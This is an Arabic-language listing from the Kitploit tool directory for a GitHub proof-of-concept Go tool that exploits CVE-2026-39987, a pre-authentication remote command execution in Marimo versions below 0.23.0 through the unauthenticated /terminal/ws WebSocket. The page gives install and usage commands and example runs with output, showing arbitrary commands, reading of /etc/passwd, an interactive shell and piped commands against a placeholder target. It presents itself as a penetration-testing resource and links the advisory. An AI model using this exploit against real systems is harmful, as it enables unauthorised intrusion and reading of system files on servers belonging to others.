Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-39987 — يستغل ثغرة CVE-2026-39987 لتنفيذ أوامر عن بُعد (RCE) قبل المصادقة في Marimo <0.23.0 عبر الاتصال بـ WebSocket غير المُصادَق /terminal/ws. يدعم تنفيذ الأوامر التعسفية، والإدخال عبر الأنابيب، وجلسات شل التفاعلية. | Kitploit
أدوات/GitHubGitHub/matesz44/cve-2026-39987
المصادقة والترخيصالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubmatesz44/cve-2026-39987

cve-2026-39987

يستغل ثغرة CVE-2026-39987 لتنفيذ أوامر عن بُعد (RCE) قبل المصادقة في Marimo <0.23.0 عبر الاتصال بـ WebSocket غير المُصادَق /terminal/ws. يدعم تنفيذ الأوامر التعسفية، والإدخال عبر الأنابيب، وجلسات شل التفاعلية.

عرض المستودع
6منذ 28 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة


cve-2026-39987

التثبيت • الاستخدام • أمثلة

أنا فقط أجرّب Go :D بالمناسبة: CVE-2026-39987 PoC: Marimo<0.23.0 تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة عبر تجاوز مصادقة WebSocket الطرفية (لا يوجد فحص authn على /terminal/ws).

الموارد:

  • https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc
  • https://nvd.nist.gov/vuln/detail/CVE-2026-39987

التثبيت

root@kitploit:~
go install -v github.com/matesz44/cve-2026-39987/cmd/cve-2026-39987@latest

الاستخدام

root@kitploit:~
cve-2026-39987 -h

سيؤدي هذا إلى عرض مساعدة الأداة. فيما يلي جميع الخيارات التي تدعمها.

root@kitploit:~
CVE-2026-39987 PoC: Marimo<0.23.0 Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
- Source: https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc

Usage:
  ./cve-2026-39987 [flags]

Flags:
   -t, -target string  Target WebSocket URL (required, e.g., ws(s)://[TARGET]:([PORT])/terminal/ws)
   -c, -cmd string     Command to Run (default "uname -a")
   -i, -interactive    Interactive Mode

أمثلة

الأمر الافتراضي (uname -a):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws
REDACTED@REDACTED:~$ uname -a
Linux [...]
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

أمر مخصص (-c):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws -c "cat /etc/passwd"
REDACTED@REDACTED:~$ cat /etc/passwd
exit
root:x:0:0: [...]
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

الوضع التفاعلي (-i):

root@kitploit:~
cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws -i
REDACTED@REDACTED:~$ id
id
uid=1000(REDACTED) gid=1000(REDACTED) groups=1000(REDACTED)
REDACTED@REDACTED:~$ whoami
whoami
REDACTED
REDACTED@REDACTED:~$ exit
exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended

التوصيل عبر الأنابيب:

root@kitploit:~
printf "id\nwhoami" | cve-2026-39987 -t ws(s)://<TARGET>[:PORT]/terminal/ws
REDACTED@REDACTED:~$ id
whoami
exit
uid=1000(REDACTED) gid=1000(REDACTED) groups=1000(REDACTED)
REDACTED@REDACTED:~$ whoami
REDACTED
REDACTED@REDACTED:~$ exit
exit

[INF:normalclose] websocket: close 1000 (normal): Terminal session ended
تنزيل الأداة